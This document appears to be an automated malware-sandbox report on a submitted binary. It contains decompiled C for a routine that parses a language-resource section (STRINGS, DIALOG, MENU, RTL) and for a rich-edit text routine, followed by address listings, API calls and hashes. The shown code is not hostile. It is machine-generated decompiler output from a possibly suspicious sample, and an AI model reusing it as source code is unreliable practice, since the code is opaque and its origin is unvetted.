								__eflags = _t303 - 0x100;
								if(_t303 < 0x100) {
									continue;
								}
								__eflags = _t385 - 0xffffffff;
								if(_t385 == 0xffffffff) {
									goto L57;
								}
								break;
							}
							L10:
							while(1) {
								if( *((char*)(_t394 + _t388 - 0x4304)) != 0x2a ||  *((char*)(_t394 + _t388 - 0x4303)) != 0x2a) {
									L14:
									_t374 = 0x2a;
									if( *((intOrPtr*)(_t394 + _t388 - 0x4304)) != _t374) {
										L18:
										if( *((char*)(_t394 + _t388 - 0x4304)) != 0x52 ||  *((char*)(_t394 + _t388 - 0x4303)) != 0x61) {
											L21:
											_t388 = _t388 + 1;
											if(_t388 >  *(_t394 - 0x30)) {
												goto L25;
											}
											_t298 =  *(_t394 - 0x28);
											continue;
										} else {
											_t306 = E00A261B0(_t394 - 0x4302 + _t388, 0xa338ec, 4);
											_t398 = _t398 + 0xc;
											if(_t306 == 0) {
												goto L57;
											}
											goto L21;
										}
									}
									_t370 = _t394 - 0x4300 + _t388;
									if( *((intOrPtr*)(_t394 - 0x4300 + _t388 - 2)) == _t374 && _t388 <= _t298 + 0xffffffe0) {
										_t308 = E00A25AF8(_t370, L"*messages***", 0xb);
										_t398 = _t398 + 0xc;
										if(_t308 == 0) {
											 *(_t394 - 0x15) = 1;
											goto L24;
										}
									}
									goto L18;
								} else {
									_t311 = E00A261B0(_t394 - 0x4302 + _t388, "*messages***", 0xb);
									_t398 = _t398 + 0xc;
									if(_t311 == 0) {
										L24:
										_t299 =  *(_t394 - 0x10);
										_t385 = _t388 +  *(_t394 - 0x10);
										 *(_t394 - 0x20) = _t385;
										goto L26;
									}
									_t298 =  *(_t394 - 0x28);
									goto L14;
								}
							}
						}
						asm("cdq");
						E00A09ED0(_t394 - 0x2304, _t394, _t385, _t374, _t320);
						_push(0x200002); // executed
						_t212 = E00A238A3(_t394 - 0x2304); // executed
						_t386 = _t212;
						 *(_t394 - 0x1c) = _t386;
						__eflags = _t386;
						if(_t386 == 0) {
							goto L57;
						}
						_t332 = E00A09D90(_t394 - 0x2304, _t374, _t386, 0x200000);
						 *(_t394 - 0x20) = _t332;
						__eflags =  *(_t394 - 0x15);
						if( *(_t394 - 0x15) == 0) {
							_push(2 + _t332 * 2);
							_t216 = E00A238A3(_t332);
							 *(_t394 - 0x30) = _t216;
							__eflags = _t216;
							if(_t216 == 0) {
								goto L57;
							}
							_t334 =  *(_t394 - 0x20);
							 *(_t334 + _t386) = _t320;
							__eflags = _t334 + 1;
							E00A11692(_t386, _t216, _t334 + 1);
							L00A2389E(_t386);
							_t386 =  *(_t394 - 0x30);
							_t337 =  *(_t394 - 0x20);
							 *(_t394 - 0x1c) = _t386;
							L33:
							_t219 = 0x100000;
							__eflags = _t337 - 0x100000;
							if(_t337 <= 0x100000) {
								_t219 = _t337;
							}
							 *((short*)(_t386 + _t219 * 2)) = 0;
							E00A100D6(_t394 - 0x14c, 0xa338f4, 0x64);
							_push(0x20002); // executed
							_t222 = E00A238A3(0); // executed
							 *(_t394 - 0x10) = _t222;
							__eflags = _t222;
							if(_t222 != 0) {
								__eflags =  *(_t394 - 0x20);
								_t340 = _t320;
								_t375 = _t320;
								 *(_t394 - 0x14) = _t340;
								 *(_t394 - 0x84) = _t320;
								_t387 = _t320;
								 *(_t394 - 0x28) = _t320;
								if( *(_t394 - 0x20) <= 0) {
									L54:
									E00A0D13A(_t391, _t375, _t394 - 0x84, _t222, _t340);
									L00A2389E( *(_t394 - 0x1c)); // executed
									L00A2389E( *(_t394 - 0x10));
									__eflags =  *((intOrPtr*)(_t391 + 0x2c)) - _t320;
									if( *((intOrPtr*)(_t391 + 0x2c)) <= _t320) {
										L56:
										 *0xa40f94 =  *((intOrPtr*)(_t391 + 0x28));
										E00A25D80(_t320, _t387, _t391,  *((intOrPtr*)(_t391 + 0x3c)),  *((intOrPtr*)(_t391 + 0x40)), 4, E00A0D330);
										E00A25D80(_t320, _t387, _t391,  *((intOrPtr*)(_t391 + 0x50)),  *((intOrPtr*)(_t391 + 0x54)), 4, E00A0D360);
										goto L57;
									} else {
										goto L55;
									}
									do {
										L55:
										E00A0DCEC(_t391 + 0x3c, _t375, _t320);
										E00A0DCEC(_t391 + 0x50, _t375, _t320);
										_t320 = _t320 + 1;
										__eflags = _t320 -  *((intOrPtr*)(_t391 + 0x2c));
									} while (_t320 <  *((intOrPtr*)(_t391 + 0x2c)));
									goto L56;
								}
								 *((intOrPtr*)(_t394 - 0x34)) = 0xd;
								 *((intOrPtr*)(_t394 - 0x38)) = 0xa;
								 *(_t394 - 0x30) = 9;
								do {
									_t232 =  *(_t394 - 0x1c);
									__eflags = _t387;
									if(_t387 == 0) {
										L80:
										_t376 =  *(_t232 + _t387 * 2) & 0x0000ffff;
										_t387 = _t387 + 1;
										__eflags = _t376;
										if(_t376 == 0) {
											break;
										}
										__eflags = _t376 -  *((intOrPtr*)(_t394 - 0x40));
										if(_t376 !=  *((intOrPtr*)(_t394 - 0x40))) {
											_t233 = 0xd;
											__eflags = _t376 - _t233;
											if(_t376 == _t233) {
												L99:
												E00A0D13A(_t391,  *(_t394 - 0x28), _t394 - 0x84,  *(_t394 - 0x10), _t340);
												 *(_t394 - 0x84) = _t320;
												_t340 = _t320;
												 *(_t394 - 0x28) = _t320;
												L98:
												 *(_t394 - 0x14) = _t340;
												goto L52;
											}
											_t236 = 0xa;
											__eflags = _t376 - _t236;
											if(_t376 == _t236) {
												goto L99;
											}
											L96:
											__eflags = _t340 - 0x10000;
											if(_t340 >= 0x10000) {
												goto L52;
											}
											 *( *(_t394 - 0x10) + _t340 * 2) = _t376;
											_t340 = _t340 + 1;
											__eflags = _t340;
											goto L98;
										}
										__eflags = _t340 - 0x10000;
										if(_t340 >= 0x10000) {
											goto L52;
										}
										_t239 = ( *(_t232 + _t387 * 2) & 0x0000ffff) - 0x22;
										__eflags = _t239;
										if(_t239 == 0) {
											_push(0x22);
											L93:
											_pop(_t381);
											 *( *(_t394 - 0x10) + _t340 * 2) = _t381;
											_t340 = _t340 + 1;
											 *(_t394 - 0x14) = _t340;
											_t387 = _t387 + 1;
											goto L52;
										}
										_t241 = _t239 - 0x3a;
										__eflags = _t241;
										if(_t241 == 0) {
											_push(0x5c);
											goto L93;
										}
										_t242 = _t241 - 0x12;
										__eflags = _t242;
										if(_t242 == 0) {
											_push(0xa);
											goto L93;
										}
										_t243 = _t242 - 4;
										__eflags = _t243;
										if(_t243 == 0) {
											_push(0xd);
											goto L93;
										}
										__eflags = _t243 != 0;
										if(_t243 != 0) {
											goto L96;
										}
										_push(9);
										goto L93;
									}
									_t377 =  *(_t232 + _t387 * 2 - 2) & 0x0000ffff;
									__eflags = _t377 -  *((intOrPtr*)(_t394 - 0x34));
									if(_t377 ==  *((intOrPtr*)(_t394 - 0x34))) {
										L42:
										_t347 = 0x3a;
										__eflags =  *(_t232 + _t387 * 2) - _t347;
										if( *(_t232 + _t387 * 2) != _t347) {
											L71:
											 *(_t394 - 0x24) = _t232 + _t387 * 2;
											_t248 = E00A0FF9A( *(_t232 + _t387 * 2) & 0x0000ffff);
											__eflags = _t248;
											if(_t248 == 0) {
												L79:
												_t340 =  *(_t394 - 0x14);
												_t232 =  *(_t394 - 0x1c);
												goto L80;
											}
											E00A10131(_t394 - 0x2dc,  *(_t394 - 0x24), 0x64);
											_t252 = E00A25B75(_t394 - 0x2dc, L" \t,");
											 *(_t394 - 0x24) = _t252;
											__eflags = _t252;
											if(_t252 == 0) {
												goto L79;
											}
											 *_t252 = 0;
											E00A118AE(_t394 - 0x2dc, _t394 - 0x1b0, 0x64);
											E00A100D6(_t394 - 0xe8, _t394 - 0x14c, 0x64);
											E00A100AF(__eflags, _t394 - 0xe8, _t394 - 0x1b0, 0x64);
											E00A100D6(_t394 - 0x84, _t394 - 0xe8, 0x32);
											_t266 = E00A25BC9(_t320, 0, _t387, _t391, _t394 - 0xe8,  *_t391,  *((intOrPtr*)(_t391 + 4)), 4, E00A0D310);
											_t398 = _t398 + 0x14;
											__eflags = _t266;
											if(_t266 != 0) {
												_t272 =  *_t266 * 0xc;
												__eflags = _t272;
												_t169 = _t272 + 0xa3e150; // 0x28b64ee0
												 *(_t394 - 0x28) =  *_t169;
											}
											_t387 = _t387 + ( *(_t394 - 0x24) - _t394 - 0x2dc >> 1) + 1;
											__eflags = _t387;
											_t271 =  *(_t394 - 0x1c);
											_t378 = 0x20;
											while(1) {
												_t352 =  *(_t271 + _t387 * 2) & 0x0000ffff;
												__eflags = _t352 - _t378;
												if(_t352 == _t378) {
													goto L78;
												}
												L77:
												__eflags = _t352 -  *(_t394 - 0x30);
												if(_t352 !=  *(_t394 - 0x30)) {
													L51:
													_t340 =  *(_t394 - 0x14);
													goto L52;
												}
												L78:
												_t387 = _t387 + 1;
												_t352 =  *(_t271 + _t387 * 2) & 0x0000ffff;
												__eflags = _t352 - _t378;
												if(_t352 == _t378) {
													goto L78;
												}
												goto L77;
											}
										}
										_t393 =  *(_t394 - 0x1c);
										_t274 = _t232 | 0xffffffff;
										__eflags = _t274;
										 *(_t394 - 0x2c) = _t274;
										 *(_t394 - 0x50) = L"STRINGS";
										 *(_t394 - 0x4c) = L"DIALOG";
										 *(_t394 - 0x48) = L"MENU";
										 *(_t394 - 0x44) = L"DIRECTION";
										 *(_t394 - 0x24) = _t320;
										do {
											 *(_t394 - 0x24) = E00A23883( *((intOrPtr*)(_t394 + _t320 * 4 - 0x50)));
											_t276 = E00A25AF8(_t393 + 2 + _t387 * 2,  *((intOrPtr*)(_t394 + _t320 * 4 - 0x50)), _t275);
											_t398 = _t398 + 0x10;
											_t379 = 0x20;
											__eflags = _t276;
											if(_t276 != 0) {
												L47:
												_t277 =  *(_t394 - 0x2c);
												goto L48;
											}
											_t361 =  *(_t394 - 0x24) + _t387;
											__eflags =  *((intOrPtr*)(_t393 + 2 + _t361 * 2)) - _t379;
											if( *((intOrPtr*)(_t393 + 2 + _t361 * 2)) > _t379) {
												goto L47;
											}
											_t277 = _t320;
											_t107 = _t361 + 1; // 0x200001
											_t387 = _t107;
											 *(_t394 - 0x2c) = _t277;
											L48:
											_t320 = _t320 + 1;
											__eflags = _t320 - 4;
										} while (_t320 < 4);
										_t391 =  *((intOrPtr*)(_t394 - 0x3c));
										_t320 = 0;
										__eflags = _t277;
										if(__eflags != 0) {
											_t232 =  *(_t394 - 0x1c);
											if(__eflags <= 0) {
												goto L71;
											} else {
												goto L59;
											}
											while(1) {
												L59:
												_t355 =  *(_t232 + _t387 * 2) & 0x0000ffff;
												__eflags = _t355 - _t379;
												if(_t355 == _t379) {
													goto L61;
												}
												L60:
												__eflags = _t355 -  *(_t394 - 0x30);
												if(_t355 !=  *(_t394 - 0x30)) {
													_t380 = _t232 + _t387 * 2;
													 *(_t394 - 0x24) = _t320;
													_t278 = 0x20;
													_t356 = _t320;
													__eflags =  *_t380 - _t278;
													if( *_t380 <= _t278) {
														L66:
														 *((short*)(_t394 + _t356 * 2 - 0x214)) = 0;
														E00A118AE(_t394 - 0x214, _t394 - 0xe8, 0x64);
														_t387 = _t387 +  *(_t394 - 0x24);
														_t283 =  *(_t394 - 0x2c);
														__eflags = _t283 - 3;
														if(_t283 != 3) {
															__eflags = _t283 - 1;
															_t284 = "$%s:";
															if(_t283 != 1) {
																_t284 = "@%s:";
															}
															E00A0E046(_t394 - 0x14c, 0x64, _t284, _t394 - 0xe8);
															_t398 = _t398 + 0x10;
														} else {
															_t288 = E00A238B9(_t394 - 0x214, _t394 - 0x214, L"RTL");
															asm("sbb al, al");
															 *((char*)(_t391 + 0x64)) =  ~_t288 + 1;
														}
														goto L51;
													} else {
														goto L63;
													}
													while(1) {
														L63:
														__eflags = _t356 - 0x63;
														if(_t356 >= 0x63) {
															break;
														}
														_t291 =  *_t380;
														_t380 = _t380 + 2;
														 *((short*)(_t394 + _t356 * 2 - 0x214)) = _t291;
														_t356 = _t356 + 1;
														_t292 = 0x20;
														__eflags =  *_t380 - _t292;
														if( *_t380 > _t292) {
															continue;
														}
														break;
													}
													 *(_t394 - 0x24) = _t356;
													goto L66;
												}
												L61:
												_t387 = _t387 + 1;
												L59:
												_t355 =  *(_t232 + _t387 * 2) & 0x0000ffff;
												__eflags = _t355 - _t379;
												if(_t355 == _t379) {
													goto L61;
												}
												goto L60;
											}
										}
										E00A100D6(_t394 - 0x14c, 0xa338f4, 0x64);
										goto L51;
									}
									_t83 = _t394 - 0x38; // 0xa
									__eflags = _t377 -  *_t83;
									if(_t377 !=  *_t83) {
										goto L80;
									}
									goto L42;
									L52:
									__eflags = _t387 -  *(_t394 - 0x20);
								} while (_t387 <  *(_t394 - 0x20));
								_t222 =  *(_t394 - 0x10);
								_t375 =  *(_t394 - 0x28);
								goto L54;
							} else {
								L00A2389E(_t386);
								goto L57;
							}
						}
						_t337 = _t332 >> 1;
						 *(_t394 - 0x20) = _t337;
						goto L33;
					} else {
						goto L5;
					}
					do {
						L5:
						E00A0DCEC(_t391, _t374, _t384);
						E00A0DCEC(_t391 + 0x14, _t374, _t384);
						_t384 = _t384 + 1;
						_t403 = _t384 -  *0xa3e5f4; // 0x63
					} while (_t403 < 0);
					_t320 = 0;
					goto L7;
				}
			}







































































                                                        0x00a0d601
                                                        0x00a0d601
                                                        0x00a0d606
                                                        0x00a0d610
                                                        0x00a0d61a
                                                        0x00a0d61b
                                                        0x00a0d61c
                                                        0x00a0d61f
                                                        0x00a0d621
                                                        0x00a0d624
                                                        0x00a0d627
                                                        0x00a0d62d
                                                        0x00a0d62f
                                                        0x00a0d632
                                                        0x00a0d638
                                                        0x00a0d674
                                                        0x00a0d63a
                                                        0x00a0d642
                                                        0x00a0d65a
                                                        0x00a0d664
                                                        0x00a0d664
                                                        0x00a0d67f
                                                        0x00a0d684
                                                        0x00a0d68c
                                                        0x00a0d68f
                                                        0x00a0d69d
                                                        0x00a0da60
                                                        0x00a0da66
                                                        0x00a0da71
                                                        0x00a0da7b
                                                        0x00a0d6a3
                                                        0x00a0d6a3
                                                        0x00a0d6a5
                                                        0x00a0d6ab
                                                        0x00a0d6c9
                                                        0x00a0d6d5
                                                        0x00a0d6e7
                                                        0x00a0d6ec
                                                        0x00a0d6ef
                                                        0x00a0d6f2
                                                        0x00a0d6f5
                                                        0x00a0d6f8
                                                        0x00a0d6fb
                                                        0x00a0d70f
                                                        0x00a0d724
                                                        0x00a0d729
                                                        0x00a0d72c
                                                        0x00a0d72e
                                                        0x00a0d72e
                                                        0x00a0d731
                                                        0x00a0d736
                                                        0x00a0d7f5
                                                        0x00a0d7f5
                                                        0x00a0d7f8
                                                        0x00a0d7fb
                                                        0x00a0d80c
                                                        0x00a0d814
                                                        0x00a0d815
                                                        0x00a0d818
                                                        0x00a0d81d
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0d823
                                                        0x00a0d826
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0d826
                                                        0x00000000
                                                        0x00a0d73c
                                                        0x00a0d744
                                                        0x00a0d76f
                                                        0x00a0d771
                                                        0x00a0d77a
                                                        0x00a0d7a5
                                                        0x00a0d7ad
                                                        0x00a0d7d9
                                                        0x00a0d7d9
                                                        0x00a0d7dd
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0d7df
                                                        0x00000000
                                                        0x00a0d7b9
                                                        0x00a0d7c9
                                                        0x00a0d7ce
                                                        0x00a0d7d3
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0d7d3
                                                        0x00a0d7ad
                                                        0x00a0d782
                                                        0x00a0d788
                                                        0x00a0d799
                                                        0x00a0d79e
                                                        0x00a0d7a3
                                                        0x00a0d7e7
                                                        0x00000000
                                                        0x00a0d7e7
                                                        0x00a0d7a3
                                                        0x00000000
                                                        0x00a0d750
                                                        0x00a0d760
                                                        0x00a0d765
                                                        0x00a0d76a
                                                        0x00a0d7eb
                                                        0x00a0d7eb
                                                        0x00a0d7ee
                                                        0x00a0d7f0
                                                        0x00000000
                                                        0x00a0d7f0
                                                        0x00a0d76c
                                                        0x00000000
                                                        0x00a0d76c
                                                        0x00a0d744
                                                        0x00a0d73c
                                                        0x00a0d835
                                                        0x00a0d838
                                                        0x00a0d83d
                                                        0x00a0d842
                                                        0x00a0d847
                                                        0x00a0d849
                                                        0x00a0d84d
                                                        0x00a0d84f
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0d866
                                                        0x00a0d86b
                                                        0x00a0d86e
                                                        0x00a0d870
                                                        0x00a0d880
                                                        0x00a0d881
                                                        0x00a0d886
                                                        0x00a0d88a
                                                        0x00a0d88c
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0d892
                                                        0x00a0d895
                                                        0x00a0d898
                                                        0x00a0d89c
                                                        0x00a0d8a2
                                                        0x00a0d8a7
                                                        0x00a0d8ab
                                                        0x00a0d8ae
                                                        0x00a0d8b1
                                                        0x00a0d8b1
                                                        0x00a0d8b6
                                                        0x00a0d8b8
                                                        0x00a0d8ba
                                                        0x00a0d8ba
                                                        0x00a0d8c0
                                                        0x00a0d8d0
                                                        0x00a0d8d5
                                                        0x00a0d8da
                                                        0x00a0d8df
                                                        0x00a0d8e3
                                                        0x00a0d8e5
                                                        0x00a0d8f3
                                                        0x00a0d8f7
                                                        0x00a0d8f9
                                                        0x00a0d8fb
                                                        0x00a0d8fe
                                                        0x00a0d904
                                                        0x00a0d906
                                                        0x00a0d909
                                                        0x00a0d9f1
                                                        0x00a0d9fd
                                                        0x00a0da05
                                                        0x00a0da0d
                                                        0x00a0da14
                                                        0x00a0da17
                                                        0x00a0da31
                                                        0x00a0da3e
                                                        0x00a0da46
                                                        0x00a0da58
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0da19
                                                        0x00a0da19
                                                        0x00a0da1d
                                                        0x00a0da26
                                                        0x00a0da2b
                                                        0x00a0da2c
                                                        0x00a0da2c
                                                        0x00000000
                                                        0x00a0da19
                                                        0x00a0d90f
                                                        0x00a0d916
                                                        0x00a0d91d
                                                        0x00a0d924
                                                        0x00a0d924
                                                        0x00a0d927
                                                        0x00a0d929
                                                        0x00a0dc3c
                                                        0x00a0dc3c
                                                        0x00a0dc40
                                                        0x00a0dc41
                                                        0x00a0dc44
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0dc4a
                                                        0x00a0dc4e
                                                        0x00a0dca0
                                                        0x00a0dca1
                                                        0x00a0dca4
                                                        0x00a0dcca
                                                        0x00a0dcda
                                                        0x00a0dcdf
                                                        0x00a0dce5
                                                        0x00a0dce7
                                                        0x00a0dcc2
                                                        0x00a0dcc2
                                                        0x00000000
                                                        0x00a0dcc2
                                                        0x00a0dca8
                                                        0x00a0dca9
                                                        0x00a0dcac
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0dcae
                                                        0x00a0dcae
                                                        0x00a0dcb4
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0dcbd
                                                        0x00a0dcc1
                                                        0x00a0dcc1
                                                        0x00000000
                                                        0x00a0dcc1
                                                        0x00a0dc50
                                                        0x00a0dc56
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0dc60
                                                        0x00a0dc60
                                                        0x00a0dc63
                                                        0x00a0dc8a
                                                        0x00a0dc8c
                                                        0x00a0dc8f
                                                        0x00a0dc90
                                                        0x00a0dc94
                                                        0x00a0dc95
                                                        0x00a0dc98
                                                        0x00000000
                                                        0x00a0dc98
                                                        0x00a0dc65
                                                        0x00a0dc65
                                                        0x00a0dc68
                                                        0x00a0dc86
                                                        0x00000000
                                                        0x00a0dc86
                                                        0x00a0dc6a
                                                        0x00a0dc6a
                                                        0x00a0dc6d
                                                        0x00a0dc82
                                                        0x00000000
                                                        0x00a0dc82
                                                        0x00a0dc6f
                                                        0x00a0dc6f
                                                        0x00a0dc72
                                                        0x00a0dc7e
                                                        0x00000000
                                                        0x00a0dc7e
                                                        0x00a0dc75
                                                        0x00a0dc78
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0dc7a
                                                        0x00000000
                                                        0x00a0dc7a
                                                        0x00a0d92f
                                                        0x00a0d934
                                                        0x00a0d938
                                                        0x00a0d944
                                                        0x00a0d946
                                                        0x00a0d947
                                                        0x00a0d94b
                                                        0x00a0db40
                                                        0x00a0db43
                                                        0x00a0db4a
                                                        0x00a0db4f
                                                        0x00a0db51
                                                        0x00a0dc36
                                                        0x00a0dc36
                                                        0x00a0dc39
                                                        0x00000000
                                                        0x00a0dc39
                                                        0x00a0db63
                                                        0x00a0db74
                                                        0x00a0db79
                                                        0x00a0db7e
                                                        0x00a0db80
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0db88
                                                        0x00a0db9b
                                                        0x00a0dbb0
                                                        0x00a0dbc5
                                                        0x00a0dbda
                                                        0x00a0dbf2
                                                        0x00a0dbf7
                                                        0x00a0dbfa
                                                        0x00a0dbfc
                                                        0x00a0dbfe
                                                        0x00a0dbfe
                                                        0x00a0dc01
                                                        0x00a0dc07
                                                        0x00a0dc07
                                                        0x00a0dc1a
                                                        0x00a0dc1a
                                                        0x00a0dc1c
                                                        0x00a0dc1f
                                                        0x00a0dc20
                                                        0x00a0dc20
                                                        0x00a0dc24
                                                        0x00a0dc27
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0dc29
                                                        0x00a0dc29
                                                        0x00a0dc2d
                                                        0x00a0d9df
                                                        0x00a0d9df
                                                        0x00000000
                                                        0x00a0d9df
                                                        0x00a0dc33
                                                        0x00a0dc33
                                                        0x00a0dc20
                                                        0x00a0dc24
                                                        0x00a0dc27
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0dc27
                                                        0x00a0dc20
                                                        0x00a0d951
                                                        0x00a0d954
                                                        0x00a0d954
                                                        0x00a0d957
                                                        0x00a0d95a
                                                        0x00a0d961
                                                        0x00a0d968
                                                        0x00a0d96f
                                                        0x00a0d976
                                                        0x00a0d979
                                                        0x00a0d98a
                                                        0x00a0d991
                                                        0x00a0d996
                                                        0x00a0d99b
                                                        0x00a0d99c
                                                        0x00a0d99e
                                                        0x00a0d9b6
                                                        0x00a0d9b6
                                                        0x00000000
                                                        0x00a0d9b6
                                                        0x00a0d9a3
                                                        0x00a0d9a5
                                                        0x00a0d9aa
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0d9ac
                                                        0x00a0d9ae
                                                        0x00a0d9ae
                                                        0x00a0d9b1
                                                        0x00a0d9b9
                                                        0x00a0d9b9
                                                        0x00a0d9ba
                                                        0x00a0d9ba
                                                        0x00a0d9bf
                                                        0x00a0d9c2
                                                        0x00a0d9c4
                                                        0x00a0d9c6
                                                        0x00a0da7e
                                                        0x00a0da81
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0da87
                                                        0x00a0da87
                                                        0x00a0da87
                                                        0x00a0da8b
                                                        0x00a0da8e
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0da90
                                                        0x00a0da90
                                                        0x00a0da94
                                                        0x00a0da99
                                                        0x00a0da9c
                                                        0x00a0daa1
                                                        0x00a0daa2
                                                        0x00a0daa4
                                                        0x00a0daa7
                                                        0x00a0dac8
                                                        0x00a0daca
                                                        0x00a0dae2
                                                        0x00a0dae7
                                                        0x00a0daea
                                                        0x00a0daed
                                                        0x00a0daf0
                                                        0x00a0db13
                                                        0x00a0db16
                                                        0x00a0db1b
                                                        0x00a0db1d
                                                        0x00a0db1d
                                                        0x00a0db33
                                                        0x00a0db38
                                                        0x00a0daf2
                                                        0x00a0dafe
                                                        0x00a0db06
                                                        0x00a0db0b
                                                        0x00a0db0b
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0daa9
                                                        0x00a0daa9
                                                        0x00a0daa9
                                                        0x00a0daac
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0daae
                                                        0x00a0dab1
                                                        0x00a0dab4
                                                        0x00a0dabc
                                                        0x00a0dabf
                                                        0x00a0dac0
                                                        0x00a0dac3
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0dac3
                                                        0x00a0dac5
                                                        0x00000000
                                                        0x00a0dac5
                                                        0x00a0da96
                                                        0x00a0da96
                                                        0x00a0da87
                                                        0x00a0da87
                                                        0x00a0da8b
                                                        0x00a0da8e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0da8e
                                                        0x00a0da87
                                                        0x00a0d9da
                                                        0x00000000
                                                        0x00a0d9da
                                                        0x00a0d93a
                                                        0x00a0d93a
                                                        0x00a0d93e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0d9e2
                                                        0x00a0d9e2
                                                        0x00a0d9e2
                                                        0x00a0d9eb
                                                        0x00a0d9ee
                                                        0x00000000
                                                        0x00a0d8e7
                                                        0x00a0d8e8
                                                        0x00000000
                                                        0x00a0d8ed
                                                        0x00a0d8e5
                                                        0x00a0d872
                                                        0x00a0d874
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0d6ad
                                                        0x00a0d6ad
                                                        0x00a0d6b0
                                                        0x00a0d6b9
                                                        0x00a0d6be
                                                        0x00a0d6bf
                                                        0x00a0d6bf
                                                        0x00a0d6c7
                                                        0x00000000
                                                        0x00a0d6c7

                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00A0D606
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00A0D5E8,?), ref: 00A0D642
                                                        • __fprintf_l.LIBCMT ref: 00A0DB33
                                                          • Part of subcall function 00A11692: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00A0B842,00000000,?,?,?,0001039A), ref: 00A116AE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                        • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                        • API String ID: 1867786338-980926923
                                                        • Opcode ID: adba187c3e09d1decc93f1bbc4f16f53bf27e23a8dbbaba7922608a02aaada05
                                                        • Instruction ID: 27b4f924ffcfc2ee92673a839fdba91e0d12fa5f28ca7af9b78394831cf5d678
                                                        • Opcode Fuzzy Hash: adba187c3e09d1decc93f1bbc4f16f53bf27e23a8dbbaba7922608a02aaada05
                                                        • Instruction Fuzzy Hash: 2612A072A0021DAADF24DFE4ED95BEEB7B5BF04710F10456AF105A72C1EB709A84CB64
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1CE1E Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        C-Code - Quality: 100%
                                                        			E00A1CE1E() {
				intOrPtr _t41;
				intOrPtr _t44;
				struct HWND__* _t46;
				void* _t48;
				char _t49;

				E00A1AF04(); // executed
				_t46 = GetDlgItem( *0xa48458, 0x68);
				_t49 =  *0xa48463; // 0x1
				if(_t49 == 0) {
					_t44 =  *0xa48440; // 0x0
					E00A18C2E(_t44);
					ShowWindow(_t46, 5); // executed
					SendMessageW(_t46, 0xb1, 0, 0xffffffff);
					SendMessageW(_t46, 0xc2, 0, 0xa335b4);
					 *0xa48463 = 1;
				}
				SendMessageW(_t46, 0xb1, 0x5f5e100, 0x5f5e100);
				 *(_t48 + 0x10) = 0x5c;
				SendMessageW(_t46, 0x43a, 0, _t48 + 0x10);
				 *((char*)(_t48 + 0x29)) = 0;
				_t41 =  *((intOrPtr*)(_t48 + 0x70));
				 *((intOrPtr*)(_t48 + 0x14)) = 1;
				if(_t41 != 0) {
					 *((intOrPtr*)(_t48 + 0x24)) = 0xa0;
					 *((intOrPtr*)(_t48 + 0x14)) = 0x40000001;
					 *(_t48 + 0x18) =  *(_t48 + 0x18) & 0xbfffffff | 1;
				}
				SendMessageW(_t46, 0x444, 1, _t48 + 0x10);
				SendMessageW(_t46, 0xc2, 0,  *(_t48 + 0x74));
				SendMessageW(_t46, 0xb1, 0x5f5e100, 0x5f5e100);
				if(_t41 != 0) {
					 *(_t48 + 0x18) =  *(_t48 + 0x18) & 0xfffffffe | 0x40000000;
					SendMessageW(_t46, 0x444, 1, _t48 + 0x10);
				}
				return SendMessageW(_t46, 0xc2, 0, L"\r\n");
			}








                                                        0x00a1ce25
                                                        0x00a1ce3f
                                                        0x00a1ce44
                                                        0x00a1ce4a
                                                        0x00a1ce4c
                                                        0x00a1ce52
                                                        0x00a1ce5a
                                                        0x00a1ce65
                                                        0x00a1ce73
                                                        0x00a1ce79
                                                        0x00a1ce79
                                                        0x00a1ce89
                                                        0x00a1ce93
                                                        0x00a1cea3
                                                        0x00a1ceab
                                                        0x00a1ceaf
                                                        0x00a1ceb4
                                                        0x00a1ceba
                                                        0x00a1cec5
